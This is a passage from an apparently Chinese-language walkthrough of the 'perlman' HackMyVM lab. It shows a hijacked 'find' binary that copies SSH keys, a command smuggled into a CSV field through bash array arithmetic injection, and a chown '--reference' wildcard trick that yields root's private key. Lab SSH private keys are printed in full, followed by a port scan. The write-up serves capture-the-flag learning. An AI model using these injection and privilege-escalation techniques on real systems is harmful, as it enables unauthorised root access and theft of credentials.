cd \/tmp && find . -type f -user $(whoami) -name "*.$x" -exec rm {} +<\/code><\/pre>\n\u53ef\u4ee5\u8fdb\u884c\u52ab\u6301find<\/code>\u547d\u4ee4\uff01<\/p>\nrita@perlman:\/tmp$ cat find\ncp \/home\/milou\/.ssh\/id_rsa \/tmp\/flag && chmod 666 \/tmp\/flag\nrita@perlman:\/tmp$ chmod +x find\nrita@perlman:\/tmp$ cat flag\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAqbS3htQvnVwWEyQl8L1mDdnZzxHiTrP+iqmx\/LUR\/SZ+\/8bMk7c2\nKGTBZZFt3fZnF6VejwhIdm06mWtFWAIuUrr2MyUNl+QbWhG3kL\/NGPQcKoqyEgOIOkKb1V\nMr4m5k5C5Cprh3c96YVWZTVqs\/tqDBVFJ+nMlV+zJ7vbSmfJ84a2h\/h9\/ZQ+EeP97jjXhN\nGZa5Q14wons2oEsHrepmyDYlRs3a9nZe0NNq5\/FPehvNYGRvAxUwDMRTDcAATqDVL3TPln\naD02kAoJ9VQ34elDOu9X777h\/o26VudlpfHd+dYqIhfwPv5WB5bt0PXCIoYiCiA4pTWGb1\n6EOq4qR9SUJsWfmDEEG+nVjUn+ZtfHxduUG4bj2b6+ucfr\/plCvIUpnosc7x97UGh5vXxF\nRfJeBjcqEZENjSKtpuQn6OTCJ1qRcFW0bCKiUr1rUq0WFNPke9X0qXBIkfiyU2mhtIGpty\nBQHLBoSSMXEfHogB+UV9BJ4gm58ohejY3r2kB3MJAAAFiOkpltbpKZbWAAAAB3NzaC1yc2\nEAAAGBAKm0t4bUL51cFhMkJfC9Zg3Z2c8R4k6z\/oqpsfy1Ef0mfv\/GzJO3NihkwWWRbd32\nZxelXo8ISHZtOplrRVgCLlK69jMlDZfkG1oRt5C\/zRj0HCqKshIDiDpCm9VTK+JuZOQuQq\na4d3PemFVmU1arP7agwVRSfpzJVfsye720pnyfOGtof4ff2UPhHj\/e4414TRmWuUNeMKJ7\nNqBLB63qZsg2JUbN2vZ2XtDTaufxT3obzWBkbwMVMAzEUw3AAE6g1S90z5Z2g9NpAKCfVU\nN+HpQzrvV+++4f6NulbnZaXx3fnWKiIX8D7+VgeW7dD1wiKGIgogOKU1hm9ehDquKkfUlC\nbFn5gxBBvp1Y1J\/mbXx8XblBuG49m+vrnH6\/6ZQryFKZ6LHO8fe1Boeb18RUXyXgY3KhGR\nDY0irabkJ+jkwidakXBVtGwiolK9a1KtFhTT5HvV9KlwSJH4slNpobSBqbcgUBywaEkjFx\nHx6IAflFfQSeIJufKIXo2N69pAdzCQAAAAMBAAEAAAGAFg\/wbA7ZwdNe604fwJRe2B4iOt\nFQYnrz9ILrKLdBh2+hww7NOcbvu4Cdw96MMfb+oAxXprCk+wBoRdm0QiTGcOrtZujCQ6Tc\nCXGUM7U7rKrPnpg5Xi4nX6uZJrqRUfaYFzIMaDBDF0Uw+Kk83F+XAN8VQykWXLuv+eAuRh\nNeMYVhiFUlfzySukhh7lvDqXiiTVlS7HcqS3VJPL2EWg\/HHPAtGG9ar\/\/jg7J4i37LnkxO\n\/uEPrY7rmD1NrtPvNkmiNzN5cq9w30Ve9wt4nQMHpNZ+KZYojJcEVxI9qWF8wB3Rxx4pGJ\nQmvhBcZLNa+vwmhqweJ7MO2cMwdJI5BWf21TAGf\/8NQ0hoGDE0Yy2lwCVTh5Ow2xBIyV4x\nOBVl3IR0\/HSeP8p48Mh1BjhxTfpGl58C1DaH0lgk8AzmhY5Vt2WZXzd+XXm5za1KWHJcWL\nsoBlKTWPmHvaFyhnyJulrh53\/\/R\/bdgAGHjhHm63+QMlDbr7rELSmUxfyuuzx5QjqBAAAA\nwDZTWnAXApcfOvHYZ8hP6zGQybXKbVRW7SgSPjI0rJSvVsoIm\/L0NNnicDZEg5EOfuGDTk\nv1Pu8iNYF8uyXhU1ZMn81oAfK\/qWWY\/AMEmUJQt3Dp0jLQf\/n3rypRTPOotzhCQMV0ipxX\n3a\/BwR9QeNf1181S\/klWroa96epRtALzzKs0NTAg0cbmAHBDAkef4tbNBM2PRlYN+32Iyt\nVDppjsH9dX1+cWVxwenjtwQXkr4Vzo1sHADVB1rn9khroe6wAAAMEA2Th9DGLdXIUUx+J6\nw6yR6OxMgxUF4HJdP0GogQYqx93VqsXQY9GC0vMIrQNxQF+00uHyMztyOAaT9r3BoQgMq7\nvqM6W2kS5NSq1O7MbBV7ZBMA8ngWWOVvur0MaCv8vJmGA14RpD8Wo8NZuE6KAaP8d03ct+\n6EFv7Lk7shaa0QfsC2RF1h4bp\/gLG1aqhUEsepIiQH7D1WKeXmuF0Usd8wohYFKlTTrFm+\npjXbBXj25mX1hBJ1F1y6kfx+8JFN9VAAAAwQDIALCU3fCJ7sqKyGbdNxamC+vwezQ6ZptK\n8e70JxHqAEfuL\/YKsZrqyt9rFP\/9vR4kMsNo6QDzmve0YyEI2lRWKw4MMzCpsUSYVwNI0Q\nqtdIOCfYzgT2duv4wDlujQsx6rg6clDlFh1VACRc51b9169j6HkqgS9WRmdSGp+vZu\/Dol\nuY0h4YVayCtgXaLRjIPBOj46iH+PBkohdLJCi4eWze0hA5hqtvFfo221lyJN7MhD96IpIi\nHLRZcy1a50\/OUAAAARbWlsb3VAcGVybG1hbi5obXYBAg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<\/div><\/p>\nbash\u7279\u6027\u6267\u884c\u547d\u4ee4<\/h3>\nmilou@perlman:~$ sudo -l\nMatching Defaults entries for milou on perlman:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser milou may run the following commands on perlman:\n (ze_perlman) NOPASSWD: \/bin\/bash \/home\/ze_perlman\/inventory\nmilou@perlman:~$ file \/home\/ze_perlman\/inventory\n\/home\/ze_perlman\/inventory: Bourne-Again shell script, ASCII text executable\nmilou@perlman:~$ cat \/home\/ze_perlman\/inventory\n#! \/bin\/bash\n\necho -e "\\n+IT Inventory+\\n"\ngreen=$(tput setaf 2)\nbold=$(tput bold)\nnormal=$(tput sgr0)\n\nwhile IFS=, read item brand price numb\ndo\n subtotal=$((numb*price))\n echo -e "Item:\\t\\t ${bold}$item${normal}" \n echo -e "Brand:\\t\\t $brand"\n echo -e "Price\/Unit:\\t $price$" \n echo -e "Quantity:\\t $numb pcs"\n echo -e "Subtotal:\\t $subtotal$"\n echo ""\n\nfor x in ${subtotal[@]}\ndo\n(( total+=x ))\ndone\n\nsum=0\nfor i in "${total[@]}"\ndo\n (( sum+=i ))\ndone\n\ndone < <(cat perl_store.csv |sed -n '1!p')\n\necho -e "\\nTotal cost: \\t ${bold}${green}$sum$"\nmilou@perlman:~$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\ncat: perl_store.csv: No such file or directory\n\nTotal cost: $<\/code><\/pre>\n\u56de\u5230\u5176\u5bb6\u76ee\u5f55\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
milou@perlman:\/home\/ze_perlman$ ls -la\ntotal 36\ndrwxr-xr-x 4 ze_perlman ze_perlman 4096 Sep 11 2022 .\ndrwxr-xr-x 5 root root 4096 Jul 23 2022 ..\nlrwxrwxrwx 1 root root 9 Jul 23 2022 .bash_history -> \/dev\/null\n-rw-r--r-- 1 ze_perlman ze_perlman 3526 Jul 26 2022 .bashrc\n-rwxr-xr-x 1 ze_perlman ze_perlman 557 Sep 11 2022 inventory\ndrwxr-xr-x 3 ze_perlman ze_perlman 4096 Jul 26 2022 .local\n-rw-r--rw- 1 ze_perlman ze_perlman 115 Sep 11 2022 perl_store.csv\n-rw-r--r-- 1 ze_perlman ze_perlman 807 Jul 26 2022 .profile\ndrwx------ 2 ze_perlman ze_perlman 4096 Sep 11 2022 .ssh\n-rwx------ 1 ze_perlman ze_perlman 33 Sep 11 2022 user.txt\nmilou@perlman:\/home\/ze_perlman$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,550\nGPU,Nvidia,4,1150\nSCREEN,Samsung,4,400\nMOUSE,Razer,6,20\nKEYBOARD,Logitech,95,7\nmilou@perlman:\/home\/ze_perlman$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\nItem: CPU\nBrand: AMD\nPrice\/Unit: 3$\nQuantity: 550 pcs\nSubtotal: 1650$\n\nItem: GPU\nBrand: Nvidia\nPrice\/Unit: 4$\nQuantity: 1150 pcs\nSubtotal: 4600$\n\nItem: SCREEN\nBrand: Samsung\nPrice\/Unit: 4$\nQuantity: 400 pcs\nSubtotal: 1600$\n\nItem: MOUSE\nBrand: Razer\nPrice\/Unit: 6$\nQuantity: 20 pcs\nSubtotal: 120$\n\nItem: KEYBOARD\nBrand: Logitech\nPrice\/Unit: 95$\nQuantity: 7 pcs\nSubtotal: 665$\n\nTotal cost: 8635$<\/code><\/pre>\n\u8fd9\u5c31\u544a\u8bc9\u6211\u4eec\u8fd9\u4e2acsv\u662f\u53ef\u4ee5\u8fdb\u884c\u81ea\u5b9a\u4e49\u7684\uff01\u5bf9\u4e0a\u8ff0\u811a\u672c\u8fdb\u884c\u5229\u7528\u7684\u65f6\u5019\uff0c\u6d89\u53ca\u5230\u4e86\u4e00\u4e2abash\u7684\u7279\u6027\uff0c\u53ef\u4ee5\u81ea\u52a8\u89e3\u6790\u6570\u7ec4\u5185\u7684\u76f8\u5173\u5b57\u6bcd\uff0c\u5e76\u5c06\u5176\u5f53\u4f5c\u53d8\u91cf\u540d\uff0c\u5982\u4e0b\u5229\u7528\u6240\u793a\uff0c\u5177\u4f53\u5229\u7528\u65b9\u6848\u53ef\u4ee5\u5c1d\u8bd5\u770b\u7fa4\u4e3b\u7684\u89c6\u9891\uff0c\u53c2\u8003\u7b2c\u4e00\u4e2a\uff0c\u8bb2\u7684\u975e\u5e38\u7ec6\u81f4\uff01<\/p>\n
milou@perlman:\/tmp$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\n\/home\/ze_perlman\/inventory: line 10: uid=1002(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman): syntax error in expression (error token is "(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman)")\n\nTotal cost: $\nmilou@perlman:\/tmp$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,a[$(id)]<\/code><\/pre>\nmilou@perlman:\/tmp$ nano perl_store.csv\nmilou@perlman:\/tmp$ cat perl_store.csv \nitem,brand,price,numb\nCPU,AMD,3,a[$(id),$(cat \/home\/ze_perlman\/.ssh\/id_rsa > \/tmp\/flag.txt)]\nmilou@perlman:\/tmp$ sudo -u ze_perlman \/bin\/bash \/home\/ze_perlman\/inventory\n\n+IT Inventory+\n\n\/home\/ze_perlman\/inventory: line 10: uid=1002(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman),: syntax error in expression (error token is "(ze_perlman) gid=1002(ze_perlman) groups=1002(ze_perlman),")\n\nTotal cost: $\nmilou@perlman:\/tmp$ cat flag.txt\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEA200PYB\/uIyQrbCV1qG1NUIz6KlWiFxoOmrAIQKdahaRX0MY28IhS\n7eW4241VG2cPvWturv1yaej9LxItknddx40TvYUZ\/GnLZaVJd1cwBD3WJmuN+wtNyqPf1Y\nOpI05FmI7Kpsh6R9G8Q4F7H6l2SfSiOK6c+Rs3nLsd7651fH7CvHiC4kci7A0FC3GLdbcH\nQR9A02YYalXDfexaeccGz\/1KTN+01\/A6PONeH\/kvmw+kIOUs9cCpxFsV7w7d\/MbsWOaA1h\nyxAtm6zCsz3TxzL6RHe7kf+31O7LcUaNMZ+yHvX+F7DjaDuNdnI8LBYDWgK7St2UbX3N7d\nrAILRVSKFaEd9BX73QF0BSABclWUjSyfb\/jLY2LbJsYB\/nUGE0rTRELIBaw4doH+WvNXhJ\ncdoB15pcsfWGi8fgK9uurQR\/vYciKjPmBIutUccyQ3sW1RKdP3YLT9EdKBrxgIsp0Ttpur\nNVAA5Gm9VspkhseJSm8TXHkBUQ48oLjXrbKvvuDxAAAFkFS8PG5UvDxuAAAAB3NzaC1yc2\nEAAAGBANtND2Af7iMkK2wldahtTVCM+ipVohcaDpqwCECnWoWkV9DGNvCIUu3luNuNVRtn\nD71rbq79cmno\/S8SLZJ3XceNE72FGfxpy2WlSXdXMAQ91iZrjfsLTcqj39WDqSNORZiOyq\nbIekfRvEOBex+pdkn0ojiunPkbN5y7He+udXx+wrx4guJHIuwNBQtxi3W3B0EfQNNmGGpV\nw33sWnnHBs\/9SkzftNfwOjzjXh\/5L5sPpCDlLPXAqcRbFe8O3fzG7FjmgNYcsQLZuswrM9\n08cy+kR3u5H\/t9Tuy3FGjTGfsh71\/hew42g7jXZyPCwWA1oCu0rdlG19ze3awCC0VUihWh\nHfQV+90BdAUgAXJVlI0sn2\/4y2Ni2ybGAf51BhNK00RCyAWsOHaB\/lrzV4SXHaAdeaXLH1\nhovH4Cvbrq0Ef72HIioz5gSLrVHHMkN7FtUSnT92C0\/RHSga8YCLKdE7abqzVQAORpvVbK\nZIbHiUpvE1x5AVEOPKC4162yr77g8QAAAAMBAAEAAAGBALIefvSGOreUMyidrFjmnjtkpf\nQopYS6B06g17Mbuqx9dU3\/ELSBJUpQobrBqnSdWu1xCu9ar8lSEgJfc2BZT3Q7I+N07kxT\n6X5fp7IkwL1RNFT0WteisMZ8H9ueGoywkFp+8B5TCu62bYEu88AdthQPfIspWBoEf0Dvwj\nrgqlA57RWDlFsRiE3NrWFEEg\/EX0IHjnGlpQMJMcVfaYUroF7izaxursYNOmAmFFdH3+DD\n7X1CZygcGkd\/6+rFWoxrTB9oAXszLleRQsDSZWAQsM6oCGprlwvWI+TAOSAwHGR\/LvrhbM\n0XFMDiGBHhv22W\/O4\/CkLQskjKZKE7QWdC6e0Gw5\/QNImNWlv0uycqWedkBF9mIVE6ocUt\nJJQiAfE6ja92TU3pGBH5V5jQu5XIaJkBl96ZolXjqY6z6\/NeW6SAWiWv\/b6WNQOC3MeHfW\n0ZRjQubfIK69VEzfumWqStgzFZ8mS+a5PaxwlefS8u4dcGZECv\/EVOQ3+X623qMnQDIQAA\nAMBKPxKVsbkLh3PR64zwqN3dbEynemSZ3lZMKNeZtYaq8byYtzGjOxfOwSGzFSb\/Wpt1XH\n\/esihGXMIwwkar3vlSDVVLMTRtq+hw4g9zks0pyHlaTBeCK47nawU1jEG+3Jqqzzsmn8ig\nGxZIcv47XWqZz5fN1tQ5AGR3KOGw994UEQqjN+UEZ9FdU6WFiTeuHdDk3+dobkOeNfyJiO\n6ycICISJjaPGo6PIsfRcGr80hermZ0xZn58TjJJ+zWcdSR1V4AAADBAO63qzbUEru94TDb\nGSE2ea9WiZsUePxvhRDDWOP12HqHM6JMwXkL\/40jVpA6uVxUDDSUo7iCLQCIezBZCJP2xB\nbmmVMDRAKoDWCwGpFcyhS\/EZqUv2Ru654GaB1Bc5HCo6v1kHfRYp284NsVhbryk+lNTyLQ\nheJ8xTUPCuzy34GN+KP469MCK6YO\/1NdJf1deB5TUMq5cZzeNp3gqDR4fg\/wb4z1BLy0nR\nyaYILHC\/kNUDYUA2rV87pOrgC+emMiXQAAAMEA6y2IHAPT9yQwFmMv1eWrySa0QbbkTulk\nlI1o+EqlVM2eU5Jv7iiEMKwRLDpkm3p+GKL5wf2\/rYod07goJTO3DEcmJvSq+YiK1LofoR\nZVjqDNowP94PtAKwoPZOC1FrIFyFs8v0YBmz4NapamNnfPOKAWgQJsrbW4Mc\/gIYijb+ja\n4WFc7yIxALDWAIZ+oa\/bcU2aoKyiUcaeMHc0bMBtJI\/NSkMSTjWPKv4Nx7ZEZ6Xdn\/kQ6z\nMiiqfchnsvWvelAAAAFnplX3BlcmxtYW5AcGVybG1hbi5obXYBAgME\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743root<\/h3>\nze_perlman@perlman:~$ sudo -l\nMatching Defaults entries for ze_perlman on perlman:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser ze_perlman may run the following commands on perlman:\n (root) NOPASSWD: \/bin\/bash \/opt\/backup\/bk *\nze_perlman@perlman:~$ cat \/opt\/backup\/bk\n#! \/bin\/bash\n\nvfy=$(<\/opt\/vfy.txt)\n\nbackup(){\n\ncp \/etc\/{passwd,shadow,sudoers} \/opt\/backup\ncp ~\/.ssh\/id_rsa \/opt\/backup\nchmod 700 \/opt\/backup\/*\nchmod 700 \/root\nchown root:root \/usr\/lib\/news\/*\nchown root:root *\nchown -R news:news \/var\/lib\/news\nchown -R www-data:www-data \/var\/www\n}\n\n[[ $1 == "${vfy\/un\/}" ]] && backup\nze_perlman@perlman:~$ cd \/opt\/backup\nze_perlman@perlman:\/opt\/backup$ cat \/opt\/vfy.txt\nundesired-root-2022\nze_perlman@perlman:\/opt\/backup$ sudo \/bin\/bash \/opt\/backup\/bk desired-root-2022\nchmod: changing permissions of '\/opt\/backup\/bk': Operation not permitted\nchown: changing ownership of 'bk': Operation not permitted\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:36 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 root root 2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root 1800 Jul 11 11:36 passwd\n-rwx------ 1 root root 1224 Jul 11 11:36 shadow\n-rwx------ 1 root root 799 Jul 11 11:36 sudoers<\/code><\/pre>\n\u8fd9\u91cc\u7528\u4e86chown\u7684\u4e00\u4e2a\u53c2\u6570\u4ece\u800c\u5229\u7528 *\u8fdb\u884c\u6267\u884c\u547d\u4ee4\uff01<\/p>\n
--reference=RFILE\nuse RFILE's owner and group rather than specifying OWNER:GROUP values. RFILE is always dereferenced.<\/code><\/pre>\n\u4ee5\u4e00\u4e2a\u6587\u4ef6\u7684\u6743\u9650\u8fdb\u884c\u53c2\u8003\uff0c\u6539\u5176\u4ed6\u6587\u4ef6\u6743\u9650\uff0c\u76f8\u5f53\u4e8e\u6309\u7167\u8fd9\u4e2a\u6a21\u677f\u6539\u6743\u9650\u3002\u3002\u3002\u3002\u3002\u800c\u6587\u4ef6\u53c8\u662f\u4f20\u8fdb\u53bb\u6587\u4ef6\u540d\u6267\u884c\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u7684\u6587\u4ef6\u540d\u5c31\u6210\u4e86\u914d\u7f6e\u9879\uff0c\u8fd9\u601d\u8def\u3002\u3002\u3002<\/p>\n
ze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:36 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 root root 2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root 1800 Jul 11 11:36 passwd\n-rwx------ 1 root root 1224 Jul 11 11:36 shadow\n-rwx------ 1 root root 799 Jul 11 11:36 sudoers\nze_perlman@perlman:\/opt\/backup$ touch whoami\nze_perlman@perlman:\/opt\/backup$ chmod 777 whoami\nze_perlman@perlman:\/opt\/backup$ touch -- '--reference=whoami'\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:41 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 root root 2602 Jul 11 11:36 id_rsa\n-rwx------ 1 root root 1800 Jul 11 11:36 passwd\n-rw-r--r-- 1 ze_perlman ze_perlman 0 Jul 11 11:41 '--reference=whoami'\n-rwx------ 1 root root 1224 Jul 11 11:36 shadow\n-rwx------ 1 root root 799 Jul 11 11:36 sudoers\n-rwxrwxrwx 1 ze_perlman ze_perlman 0 Jul 11 11:41 whoami\nze_perlman@perlman:\/opt\/backup$ sudo \/bin\/bash \/opt\/backup\/bk desired-root-2022\nchmod: changing permissions of '\/opt\/backup\/bk': Operation not permitted\nchown: cannot access 'root:root': No such file or directory\nchown: changing ownership of 'bk': Operation not permitted\nze_perlman@perlman:\/opt\/backup$ ls -la\ntotal 28\ndrwxrwx--- 2 root ze_perlman 4096 Jul 11 11:41 .\nd-wxr-x--- 3 root ze_perlman 4096 Sep 11 2022 ..\n-rwxr-xr-x 1 root root 318 Jul 23 2022 bk\n-rwx------ 1 ze_perlman ze_perlman 2602 Jul 11 11:44 id_rsa\n-rwx------ 1 ze_perlman ze_perlman 1800 Jul 11 11:44 passwd\n-rwx------ 1 ze_perlman ze_perlman 0 Jul 11 11:41 '--reference=whoami'\n-rwx------ 1 ze_perlman ze_perlman 1224 Jul 11 11:44 shadow\n-rwx------ 1 ze_perlman ze_perlman 799 Jul 11 11:44 sudoers\n-rwx------ 1 ze_perlman ze_perlman 0 Jul 11 11:41 whoami\nze_perlman@perlman:\/opt\/backup$ ssh root@0.0.0.0 -i id_rsa\nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nECDSA key fingerprint is SHA256:BrnX5xrQQLBhNII4axkXA489ckv5pH78f5Bj4aBNpKg.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '0.0.0.0' (ECDSA) to the list of known hosts.\nLinux perlman.hmv 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Sun Sep 11 12:59:15 2022 from 192.168.0.29\nroot@perlman:~# cat root.txt \n0ca2710be21eabe7ddbf0240557bd210\nroot@perlman:~# cat .local\/\n.clean_tmp share\/ \nroot@perlman:~# cat .local\/.clean_tmp\n#! \/bin\/bash\n\nfind \/tmp\/* -user $USER -exec rm -rf {} \\; 2>\/dev\/null\n\nrm -f \/var\/mail\/{milou,ze_perlman} 2>\/dev\/null<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV19H4y1p7nr\/<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/perlman]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.176:22\nOpen 192.168.0.176:25\nOpen 192.168.0.176:110\nOpen 192.168.0.176:119\nOpen 192.168.0.176:80\nOpen 192.168.0.176:995\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 f0:f4:7d:ad:5d:2a:25:ec:17:b5:62:b0:2e:a5:8d:4f (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2DYUfsVcKnbknL8l\/3obgwbwPStIpVR69RgIvubPxz0GPaYH5n9yPnria4TVmKwzkUMCmxNlfG9\/a6Fgzdom07H7eIhUAIXHOWjmq+bowp14aMEopOtizr3M7DpU5Ye46KeSy97Yu+x0bjn+6wcI+LPZudp8GSdel4324PZ4kLH5NXM4LIQygvJjQ5CIArZv2YiEDeTtDSIde90SZoIN+XcJ0+J+jzqIAJZmeT7Gqf62fj5ti\/koi9sQzTjvCpDdWjAtiKEOkP1vonyM5MlGIL\/V0+f78crS2JmSfeiKN3hTr7wRSwPBZvoDbVCiz92IgAHzxjpy5uzBTp6gY5V4wBIZhP5JGBnn3rJsvPH5T8Vr6pe4IfJ+z398b+ogyobbrJNv3aiD2u4RegviVE6r8mSBPLbKA1mIgy5qA8SHpJibKJp6+gdG0k0QcH4kBMdDNggIsuN8FxcX2CeT\/qoGOeg+KXvUrA2LDFyuVcWN9t2T6z1eA+QsPjpodmNGbOpU=\n| 256 f1:d8:01:07:9f:d7:8d:2e:da:a4:9f:36:a2:ff:2a:df (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPJwZhipbadeNNxszKG3A83dRK+orUlQ0hAZtAHH5XFrJYUYW3KTAsXHfb54rCCXQApecmcQGj\/wsWX5Udced9k=\n| 256 91:02:29:33:c5:ff:2d:d8:63:b8:47:f3:f3:d8:79:ac (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBssx4VcQhzif7T2mibWNJYqgXRDUbndkYiBGfm3XCt4\n25\/tcp open smtp syn-ack Postfix smtpd\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after: 2032-06-29T10:12:39\n| MD5: 1ac5:1a22:67a7:a9bc:71fd:5f87:af54:5639\n| SHA-1: c609:bc84:2ece:7080:8d0e:d169:d81c:f369:b50f:24ac\n| -----BEGIN CERTIFICATE-----\n| MIIC0zCCAbugAwIBAgIUYyfZ7xaEw82UQOeqR51M7iVeTFkwDQYJKoZIhvcNAQEL\n| BQAwEjEQMA4GA1UEAwwHcGVybG1hbjAeFw0yMjA3MDIxMDEyMzlaFw0zMjA2Mjkx\n| MDEyMzlaMBIxEDAOBgNVBAMMB3BlcmxtYW4wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQCZHxEKTHH6Z\/ITuPkv5F2WPEYFpFPkXHsYjBXMTUBU4fnlCGKI\n| EvYMwEJ0r7IkYxnS4ilg8nbmmZ\/fJ71y5mAMPm0hp2KVxeiuxrt8FNdzhzXYuhnX\n| izlgDDEPDY5BmUCTbyjTfiyMliMO\/129VT0uatRXmiOA+HdVIMrQjdKeXrREK7jJ\n| ELYOKMOmP5ChuGlHFup+Q2s9MbxghvX6kfXqYI7jDSWBghPZ1QUMXN5wg+Ke6qzC\n| cD53CZWckw18kn9GUtU97Wnya7R1vnd0Mq+8YEs3nSSV0GXjHscNugHGHQdcgFWg\n| tAGCSOxexcr1aS\/NyuO5pKcWJc02+G4jo1hRAgMBAAGjITAfMAkGA1UdEwQCMAAw\n| EgYDVR0RBAswCYIHcGVybG1hbjANBgkqhkiG9w0BAQsFAAOCAQEAihWPgk7Hbdmp\n| kjybLZgjXyVnQsLWr\/+KZOYnPiRfrPAIWkmdZFN6BvOTB0qq+bvaYYDZJ4NtVLcc\n| sYZGwZKicE2yqr0ZI11RlBCWy5M+0\/UfDf7f4JHl5FN27LTF4wGpgQitOV9B93OC\n| MKqQYpf\/NiNrC9j7GQZtAW30ID907jY0icdNz1\/r+7vQOLQDJu8Xjmopi+BCNtzP\n| \/L21NQAZwST4l07L0Aj5SemlljRZvlqecd2QxhmyRu0Y6CPpamtWxxpRDN4LYHaa\n| gZMY6SJ9Q79QNnF1L+CI1Ups9MpcjQoBZm2s5nJ24B7r1YczG6YtsTR6qgqnMnqr\n| LU3nfj\/LUw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: perlman.hmv, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n80\/tcp open http syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: Sync - Mobile App Landing Page HTML Template\n| http-git: \n| 192.168.0.176:80\/.git\/\n| Git repository found!\n| Repository description: Unnamed repository; edit this file 'description' to name the...\n|_ Last commit message: wp \n|_http-favicon: Unknown favicon MD5: 1BD511222AD00F8970D00AFDCF215F9B\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.54 (Debian)\n110\/tcp open pop3 syn-ack Dovecot pop3d\n|_pop3-capabilities: SASL(PLAIN) USER PIPELINING STLS RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE\n| ssl-cert: Subject: commonName=perlman\n| Subject Alternative Name: DNS:perlman\n| Issuer: commonName=perlman\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2022-07-02T10:12:39\n| Not valid after: 